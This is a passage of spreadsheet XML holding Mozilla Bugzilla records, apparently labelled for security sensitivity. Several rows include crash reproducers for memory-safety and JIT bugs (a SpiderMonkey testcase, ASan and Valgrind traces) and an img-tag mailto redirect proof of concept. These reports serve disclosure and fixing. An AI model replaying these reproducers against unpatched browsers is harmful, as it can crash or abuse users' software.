      <c r="X3903" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3904">
      <c r="A3904" t="n">
        <v>1520826</v>
      </c>
      <c r="B3904" t="inlineStr">
        <is>
          <t>2019-01-17 08:15:00 -0800</t>
        </is>
      </c>
      <c r="C3904" t="inlineStr">
        <is>
          <t>Upgrade Firefox 60 ESR to use NSS 3.36.7</t>
        </is>
      </c>
      <c r="D3904" t="inlineStr">
        <is>
          <t>2023-12-11 06:03:31 -0800</t>
        </is>
      </c>
      <c r="E3904" t="n">
        <v>1</v>
      </c>
      <c r="F3904" t="n">
        <v>1</v>
      </c>
      <c r="G3904" t="n">
        <v>3</v>
      </c>
      <c r="H3904" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3904" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3904" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K3904" t="inlineStr">
        <is>
          <t>65 Branch</t>
        </is>
      </c>
      <c r="L3904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3904" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3904" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3904" t="inlineStr">
        <is>
          <t>[psm-assigned]</t>
        </is>
      </c>
      <c r="Q3904" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3904" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3904" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3904" t="n">
        <v>1</v>
      </c>
      <c r="U3904" t="n">
        <v>0</v>
      </c>
      <c r="V3904" t="n">
        <v>6</v>
      </c>
      <c r="W3904" t="inlineStr">
        <is>
          <t>Tracking NSS 3.36.7 for Firefox 60 ESR, tag will be NSS_3_36_7_RTM.
These fixes do not require uplift to Beta 65 (see the dependent bugs for reasons). But if that's a non-skippable-step, we can also cut an NSS 3.41 dot release for beta.</t>
        </is>
      </c>
      <c r="X3904" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3905">
      <c r="A3905" t="n">
        <v>1242810</v>
      </c>
      <c r="B3905" t="inlineStr">
        <is>
          <t>2016-01-25 17:29:17 -0800</t>
        </is>
      </c>
      <c r="C3905" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned object with unexpected type, at js/src/jit/MacroAssembler.cpp:1445</t>
        </is>
      </c>
      <c r="D3905" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:07 -0700</t>
        </is>
      </c>
      <c r="E3905" t="n">
        <v>1</v>
      </c>
      <c r="F3905" t="n">
        <v>1</v>
      </c>
      <c r="G3905" t="n">
        <v>3</v>
      </c>
      <c r="H3905" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3905" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3905" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3905" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3905" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3905" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3905" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3905" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3905" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q3905" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3905" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3905" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3905" t="n">
        <v>1</v>
      </c>
      <c r="U3905" t="n">
        <v>0</v>
      </c>
      <c r="V3905" t="n">
        <v>29</v>
      </c>
      <c r="W3905" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision c2256ee8ae9a (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --ion-offthread-compile=off --ion-eager):
loadFile(`
  function foo({}) {
    for (i = 0 ; i &lt; 100; i++) 
      re = /erwe/;
  }
  RegExp.multiline = 1;
  foo(0);
`);
function loadFile(lfVarx) {
  lfGlobal = newGlobal();
  lfGlobal.offThreadCompileScript(lfVarx);
  lfGlobal.runOffThreadScript();
}
Backtrace:
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00007ffff7fbfdc5 in ?? ()
#0  0x00007ffff7fbfdc5 in ?? ()
[...]
#16 0x00007fffffffa510 in ?? ()
#17 0x00000000006bc38e in EnterIon (data=..., cx=0x404) at js/src/jit/Ion.cpp:2808
#18 js::jit::IonCannon (cx=0x404, state=...) at js/src/jit/Ion.cpp:2903
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
rax	0x7ffff7ead100	140737352749312
rbx	0xfff8800000000001	-2111062325329919
rcx	0x7ffff7ea65b0	140737352721840
rdx	0x7ffff6907818	140737330051096
rsi	0x7ffff7ead100	140737352749312
rdi	0x7ffff7ead150	140737352749392
rbp	0x7fffffffa048	140737488330824
rsp	0x7fffffffa038	140737488330808
r8	0xfff9800000000000	-1829587348619264
r9	0x7fffffff9e40	140737488330304
r10	0x7fffffff9c20	140737488329760
r11	0x7ffff6c27960	140737333328224
r12	0x0	0
r13	0x7fffffffa730	140737488332592
r14	0x404	1028
r15	0x7fffffffa100	140737488331008
rip	0x7ffff7fbfdc5	140737353874885
=&gt; 0x7ffff7fbfdc5:	push   %r10
   0x7ffff7fbfdc7:	push   %r9
Not sure what's going on here, marking s-s.</t>
        </is>
      </c>
      <c r="X3905" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3906">
      <c r="A3906" t="n">
        <v>682464</v>
      </c>
      <c r="B3906" t="inlineStr">
        <is>
          <t>2011-08-26 16:22:47 -0700</t>
        </is>
      </c>
      <c r="C3906" t="inlineStr">
        <is>
          <t>[Flash npswf32.dll] Reprocess signature npswf32.dll@0x141855...</t>
        </is>
      </c>
      <c r="D3906" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E3906" t="n">
        <v>1</v>
      </c>
      <c r="F3906" t="n">
        <v>1</v>
      </c>
      <c r="G3906" t="n">
        <v>4</v>
      </c>
      <c r="H3906" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3906" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3906" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3906" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3906" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3906" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3906" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3906" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3906" t="inlineStr"/>
      <c r="Q3906" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3906" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3906" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3906" t="n">
        <v>1</v>
      </c>
      <c r="U3906" t="n">
        <v>0</v>
      </c>
      <c r="V3906" t="n">
        <v>6</v>
      </c>
      <c r="W3906" t="inlineStr">
        <is>
          <t>Please reprocess the following signature with the updated Flash Player symbols.
reference:
https://bugzilla.mozilla.org/show_bug.cgi?id=682126</t>
        </is>
      </c>
      <c r="X3906" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3907">
      <c r="A3907" t="n">
        <v>320319</v>
      </c>
      <c r="B3907" t="inlineStr">
        <is>
          <t>2005-12-14 17:13:57 -0800</t>
        </is>
      </c>
      <c r="C3907" t="inlineStr">
        <is>
          <t>Release Notes for Bugzilla 2.20.1</t>
        </is>
      </c>
      <c r="D3907" t="inlineStr">
        <is>
          <t>2006-02-09 17:51:31 -0800</t>
        </is>
      </c>
      <c r="E3907" t="n">
        <v>1</v>
      </c>
      <c r="F3907" t="n">
        <v>1</v>
      </c>
      <c r="G3907" t="n">
        <v>4</v>
      </c>
      <c r="H3907" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3907" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3907" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K3907" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L3907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3907" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3907" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3907" t="inlineStr"/>
      <c r="Q3907" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3907" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3907" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T3907" t="n">
        <v>1</v>
      </c>
      <c r="U3907" t="n">
        <v>0</v>
      </c>
      <c r="V3907" t="n">
        <v>8</v>
      </c>
      <c r="W3907" t="inlineStr">
        <is>
          <t>Of all the release notes that we have to write for this release, I'd appreciate help with these. :-) Basically, you just want to take a look at the URL in the URL field, and then see which bug fixes you think would be significant to users, or which ones were "major" or "critical."
Then you also have to check if any of the "Outstanding Issues" were resolved, and remove them from that list.</t>
        </is>
      </c>
      <c r="X3907" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3908">
      <c r="A3908" t="n">
        <v>791905</v>
      </c>
      <c r="B3908" t="inlineStr">
        <is>
          <t>2012-09-17 19:29:40 -0700</t>
        </is>
      </c>
      <c r="C3908" t="inlineStr">
        <is>
          <t>Heap-use-after-free in Mesa, triggerable by resizing a WebGL canvas</t>
        </is>
      </c>
      <c r="D3908" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:12 -0700</t>
        </is>
      </c>
      <c r="E3908" t="n">
        <v>1</v>
      </c>
      <c r="F3908" t="n">
        <v>1</v>
      </c>
      <c r="G3908" t="n">
        <v>3</v>
      </c>
      <c r="H3908" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3908" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3908" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3908" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3908" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3908" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3908" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3908" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3908" t="inlineStr">
        <is>
          <t>[asan][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q3908" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3908" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3908" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3908" t="n">
        <v>1</v>
      </c>
      <c r="U3908" t="n">
        <v>0</v>
      </c>
      <c r="V3908" t="n">
        <v>74</v>
      </c>
      <c r="W3908" t="inlineStr">
        <is>
          <t>Created attachment 661996
Testcase
Run the testcase from content/canvas/test/webgl/conformance/more/functions/ directory. Here is my OpenGL info.
OpenGL version string: 2.1 Mesa 8.0.2
Unsymbolized - 
==28427== ERROR: AddressSanitizer heap-use-after-free on address 0x7f299c105380 at pc 0x4c1336 bp 0x7fff93b8a980 sp 0x7fff93b8a748
WRITE of size 1 at 0x7f299c105380 thread T0
    #0 0x4c1335 (/tmp/firefox/firefox+0x4c1335)
    #1 0x7f29a15438c1 (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x738c1)
0x7f299c105380 is located 0 bytes inside of 64-byte region [0x7f299c105380,0x7f299c1053c0)
freed by thread T0 here:
    #0 0x4c4a10 (/tmp/firefox/firefox+0x4c4a10)
    #1 0x7f29a11c4c19 (/usr/lib/x86_64-linux-gnu/dri/libdricore.so+0x155c19)
previously allocated by thread T0 here:
    #0 0x4c4d4a (/tmp/firefox/firefox+0x4c4d4a)
    #1 0x7f29a10f9d60 (/usr/lib/x86_64-linux-gnu/dri/libdricore.so+0x8ad60)
Shadow byte and word:
  0x1fe533820a70: fd
  0x1fe533820a70: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe533820a50: fd fd fd fd fd fd fd fd
  0x1fe533820a58: fd fd fd fd fd fd fd fd
  0x1fe533820a60: fa fa fa fa fa fa fa fa
  0x1fe533820a68: fa fa fa fa fa fa fa fa
=&gt;0x1fe533820a70: fd fd fd fd fd fd fd fd
  0x1fe533820a78: fd fd fd fd fd fd fd fd
  0x1fe533820a80: fa fa fa fa fa fa fa fa
  0x1fe533820a88: fa fa fa fa fa fa fa fa
  0x1fe533820a90: fd fd fd fd fd fd fd fd
Stats: 214M malloced (217M for red zones) by 289321 calls
Stats: 30M realloced by 12288 calls
Stats: 174M freed by 171411 calls
Stats: 42M really freed by 47020 calls
Stats: 420M (107600 full pages) mmaped in 105 calls
  mmaps   by size class: 8:212979; 9:40955; 10:8190; 11:10235; 12:2048; 13:2048; 14:1536; 15:256; 16:384; 17:1312; 18:144; 19:40; 20:20; 
  mallocs by size class: 8:221586; 9:38394; 10:7643; 11:13561; 12:2266; 13:2004; 14:1530; 15:310; 16:504; 17:1333; 18:136; 19:37; 20:17; 
  frees   by size class: 8:122227; 9:28108; 10:4313; 11:10535; 12:1422; 13:1409; 14:1332; 15:256; 16:443; 17:1283; 18:32; 19:36; 20:15; 
  rfrees  by size class: 8:34255; 9:5161; 10:1300; 11:4626; 12:388; 13:372; 14:332; 15:83; 16:229; 17:263; 18:6; 19:4; 20:1; 
Stats: malloc large: 1523 small slow: 1623
==28427== ABORTING
Symbolized -
==27925== ERROR: AddressSanitizer heap-use-after-free on address 0x7ff8472f3c80 at pc 0x4c1336 bp 0x7fffa43d7d20 sp 0x7fffa43d7ae8
WRITE of size 1 at 0x7ff8472f3c80 thread T0
    #0 0x4c1335 in memcpy ??:?
    #1 0x7ff84cf438c1 in ?? ??:0
0x7ff8472f3c80 is located 0 bytes inside of 64-byte region [0x7ff8472f3c80,0x7ff8472f3cc0)
freed by thread T0 here:
    #0 0x4c4a10 in __interceptor_free ??:?
    #1 0x7ff84cbc4c19 in ?? ??:0
previously allocated by thread T0 here:
    #0 0x4c4d4a in __interceptor_posix_memalign ??:?
    #1 0x7ff84caf9d60 in ?? ??:0
Shadow byte and word:
  0x1fff08e5e790: fd
  0x1fff08e5e790: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fff08e5e770: fd fd fd fd fd fd fd fd
  0x1fff08e5e778: fd fd fd fd fd fd fd fd
  0x1fff08e5e780: fa fa fa fa fa fa fa fa
  0x1fff08e5e788: fa fa fa fa fa fa fa fa
=&gt;0x1fff08e5e790: fd fd fd fd fd fd fd fd
  0x1fff08e5e798: fd fd fd fd fd fd fd fd
  0x1fff08e5e7a0: fa fa fa fa fa fa fa fa
  0x1fff08e5e7a8: fa fa fa fa fa fa fa fa
  0x1fff08e5e7b0: fd fd fd fd fd fd fd fd
Stats: 214M malloced (218M for red zones) by 289327 calls
Stats: 30M realloced by 12281 calls
Stats: 174M freed by 171411 calls
Stats: 42M really freed by 46444 calls
Stats: 420M (107600 full pages) mmaped in 105 calls
  mmaps   by size class: 8:212979; 9:40955; 10:8190; 11:10235; 12:2048; 13:2048; 14:1536; 15:256; 16:384; 17:1312; 18:144; 19:40; 20:20;
  mallocs by size class: 8:221603; 9:38387; 10:7646; 11:13555; 12:2265; 13:2004; 14:1530; 15:310; 16:503; 17:1333; 18:137; 19:37; 20:17;
  frees   by size class: 8:122240; 9:28103; 10:4313; 11:10529; 12:1420; 13:1409; 14:1332; 15:256; 16:443; 17:1283; 18:32; 19:36; 20:15;
  rfrees  by size class: 8:33919; 9:5096; 10:1273; 11:4499; 12:374; 13:370; 14:328; 15:83; 16:231; 17:260; 18:6; 19:4; 20:1;
Stats: malloc large: 1524 small slow: 1614
==27925== ABORTING</t>
        </is>
      </c>
      <c r="X3908" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3909">
      <c r="A3909" t="n">
        <v>1028891</v>
      </c>
      <c r="B3909" t="inlineStr">
        <is>
          <t>2014-06-23 05:14:30 -0700</t>
        </is>
      </c>
      <c r="C3909" t="inlineStr">
        <is>
          <t>WebGL app crashes Firefox</t>
        </is>
      </c>
      <c r="D3909" t="inlineStr">
        <is>
          <t>2015-08-07 18:43:22 -0700</t>
        </is>
      </c>
      <c r="E3909" t="n">
        <v>1</v>
      </c>
      <c r="F3909" t="n">
        <v>1</v>
      </c>
      <c r="G3909" t="n">
        <v>3</v>
      </c>
      <c r="H3909" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3909" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3909" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3909" t="inlineStr">
        <is>
          <t>30 Branch</t>
        </is>
      </c>
      <c r="L3909" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3909" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3909" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3909" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3909" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q3909" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3909" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3909" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3909" t="n">
        <v>1</v>
      </c>
      <c r="U3909" t="n">
        <v>3</v>
      </c>
      <c r="V3909" t="n">
        <v>28</v>
      </c>
      <c r="W3909" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Steps to reproduce:
* Browse to http://cesiumjs.org/
* Click "Click to interact" to run the WebGL app
Actual results:
* Wait 10-30 seconds and Firefox crashes with a hard close and no noticeable new messages in the console.
This does not crash in Chrome or IE 11 and did not crash before Firefox 30.0
This is also reproducible in Firefox 32.0a2 (Aurora) and 33.0a1 (Nightly) on a variety of platforms (Windows, Linux, Mac) and GPUs.
This application loads tiled images for different parts of the globe as it spins, and creates WebGL textures for them.  The memory pressure or use of web workers for other processing may be the problem.
This is also reproducible by repeatedly zooming in and out in the simpler Cesium Viewer application (http://cesiumjs.org/Cesium/Build/Apps/CesiumViewer/index.html).  This is open-source (https://github.com/AnalyticalGraphicsInc/cesium).  We are happy to help debug and implement any workarounds.
Related discussion: https://groups.google.com/forum/#!topic/cesium-dev/6SLOxrZBqj4</t>
        </is>
      </c>
      <c r="X3909" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3910">
      <c r="A3910" t="n">
        <v>694200</v>
      </c>
      <c r="B3910" t="inlineStr">
        <is>
          <t>2011-10-12 16:58:00 -0700</t>
        </is>
      </c>
      <c r="C3910" t="inlineStr">
        <is>
          <t>Crash [@ js::mjit::ic::BaseIC::disable]</t>
        </is>
      </c>
      <c r="D3910" t="inlineStr">
        <is>
          <t>2013-03-11 08:53:45 -0700</t>
        </is>
      </c>
      <c r="E3910" t="n">
        <v>1</v>
      </c>
      <c r="F3910" t="n">
        <v>1</v>
      </c>
      <c r="G3910" t="n">
        <v>3</v>
      </c>
      <c r="H3910" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3910" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3910" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3910" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3910" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3910" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3910" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3910" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3910" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q3910" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3910" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3910" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3910" t="n">
        <v>1</v>
      </c>
      <c r="U3910" t="n">
        <v>0</v>
      </c>
      <c r="V3910" t="n">
        <v>16</v>
      </c>
      <c r="W3910" t="inlineStr">
        <is>
          <t>Created attachment 566688
Test case for shell (see README file inside).
The attached test crashes on mozilla-central revision 866b2b1793cd (see README for running instructions).
Valgrind trace:
==15832== Invalid read of size 8
==15832==    at 0x7846B5: js::mjit::ic::BaseIC::disable(JSContext*, char const*, void*) (PolyIC.cpp:2330)
==15832==    by 0x78CD95: PICStubCompiler::disable(JSContext*, char const*) (PolyIC.cpp:184)
==15832==    by 0x78CD5E: PICStubCompiler::disable(char const*) (PolyIC.cpp:180)
==15832==    by 0x783694: js::mjit::ic::GetProp(js::VMFrame&amp;, js::mjit::ic::PICInfo*) (PolyIC.cpp:1992)
==15832==    by 0x6E7C75: ??? (MethodJIT.cpp:164)
==15832==    by 0x404FB4F: ???
==15832==  Address 0x40 is not stack'd, malloc'd or (recently) free'd
S-s because crashes with this signature have been previously critical.</t>
        </is>
      </c>
      <c r="X3910" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3911">
      <c r="A3911" t="n">
        <v>452093</v>
      </c>
      <c r="B3911" t="inlineStr">
        <is>
          <t>2008-08-25 09:26:56 -0700</t>
        </is>
      </c>
      <c r="C3911" t="inlineStr">
        <is>
          <t>Redirect to mailto:address in linked image opens email editor</t>
        </is>
      </c>
      <c r="D3911" t="inlineStr">
        <is>
          <t>2010-07-15 13:54:35 -0700</t>
        </is>
      </c>
      <c r="E3911" t="n">
        <v>1</v>
      </c>
      <c r="F3911" t="n">
        <v>1</v>
      </c>
      <c r="G3911" t="n">
        <v>3</v>
      </c>
      <c r="H3911" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3911" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3911" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3911" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3911" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3911" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3911" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3911" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3911" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q3911" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3911" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3911" t="inlineStr">
        <is>
          <t>mozilla1.9.3a2</t>
        </is>
      </c>
      <c r="T3911" t="n">
        <v>1</v>
      </c>
      <c r="U3911" t="n">
        <v>0</v>
      </c>
      <c r="V3911" t="n">
        <v>39</v>
      </c>
      <c r="W3911" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
I was notified by an user ("Reelix") about a weird behavior with img tags. I wasn't able to find a duplicate, so I thought it might be better to file a report here, despite you probably being aware of the issue.
If the request for the image is answered with a response redirecting to a mailto: address, then the default email editor opens.
i.e.
&lt;img src="&lt;page that redirects to mailto:foo@bar&gt;" /&gt; will cause firefox to open the default email application.
or more verbatim:
a t.html
--snip
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd"&gt;
&lt;html&gt;
   &lt;head&gt;
      &lt;title&gt;mail test&lt;/title&gt;
   &lt;/head&gt;
   &lt;body&gt;
  &lt;img src="t.php" /&gt;
   &lt;/body&gt;
&lt;/html&gt;
--snap
Where t.php redirects to mailto:foo@bar.com?subject=Irritating%20popup&amp;body=I%20d
o%20not%20think%20image%20tags%20should%20be%20able%20to%20t
his .
Opens the email editor. I don't think that image tags should be able to open any external applications and/or cause popups.
Thanks for looking into it,
cheers
~H
Reproducible: Always
Steps to Reproduce:
1. write a page with an image tag like &lt;img src="foo.php" /&gt;
2. have foo.php redirect to mailto:foo@bar.com (header('location:mailto:foo@bar.com');)
3. View the page 
Actual Results:  
The external email editor opens.
Expected Results:  
Broken image.</t>
        </is>
      </c>
      <c r="X3911" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3912">
      <c r="A3912" t="n">
        <v>111450</v>
      </c>
      <c r="B3912" t="inlineStr">
        <is>
          <t>2001-11-22 05:59:26 -0800</t>
        </is>
      </c>
      <c r="C3912" t="inlineStr">
        <is>
          <t>Need a port of the new print dialog to BeOS</t>
        </is>
      </c>
      <c r="D3912" t="inlineStr">
        <is>
          <t>2001-12-11 23:33:23 -0800</t>
        </is>
      </c>
      <c r="E3912" t="n">
        <v>1</v>
      </c>
      <c r="F3912" t="n">
        <v>1</v>
      </c>
      <c r="G3912" t="n">
        <v>3</v>
      </c>
      <c r="H3912" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3912" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3912" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K3912" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3912" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3912" t="inlineStr">
        <is>
          <t>BeOS</t>
        </is>
      </c>
      <c r="N3912" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3912" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3912" t="inlineStr"/>
      <c r="Q3912" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3912" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3912" t="inlineStr">
        <is>
          <t>mozilla0.9.7</t>
        </is>
      </c>
      <c r="T3912" t="n">
        <v>1</v>
      </c>
      <c r="U3912" t="n">
        <v>0</v>
      </c>
      <c r="V3912" t="n">
        <v>16</v>
      </c>
      <c r="W3912" t="inlineStr">
        <is>
          <t>bug 84947 ("We need a "better" print dialog...") introduced a new print dialog
for Unix+OS/2.
Unfortunately it seems that I missed that BeOS uses the PostScript module for
printing, too - therefore we have to port the changes "done" to the Xlib/GTK+
widget code to BeOS, too...
Looking at attachment 58681 and grep'ping out the Xlib toolkit changes:
The following files have been changed - we only have to port the changes to the
matching BeOS files:
-- snip --
mozilla/gfx/src/xlib/Makefile.in
mozilla/gfx/src/xlib/nsDeviceContextSpecXlib.cpp
mozilla/gfx/src/xlib/nsDeviceContextSpecXlib.h
mozilla/gfx/src/xlib/nsGfxFactoryXlib.cpp
mozilla/gfx/src/xlib/nsPrintdXlib.h
-- snip --
I do not have a BeOS build box... I need help ...</t>
        </is>
      </c>
      <c r="X3912" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3913">
      <c r="A3913" t="n">
        <v>1345673</v>
      </c>
      <c r="B3913" t="inlineStr">
        <is>
          <t>2017-03-08 16:19:10 -0800</t>
        </is>
      </c>
      <c r="C3913" t="inlineStr">
        <is>
          <t>Open Bugzilla History in a New Window or Tab</t>
        </is>
      </c>
      <c r="D3913" t="inlineStr">
        <is>
          <t>2019-10-15 16:01:42 -0700</t>
        </is>
      </c>
      <c r="E3913" t="n">
        <v>1</v>
      </c>
      <c r="F3913" t="n">
        <v>1</v>
      </c>
      <c r="G3913" t="n">
        <v>7</v>
      </c>
      <c r="H3913" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3913" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
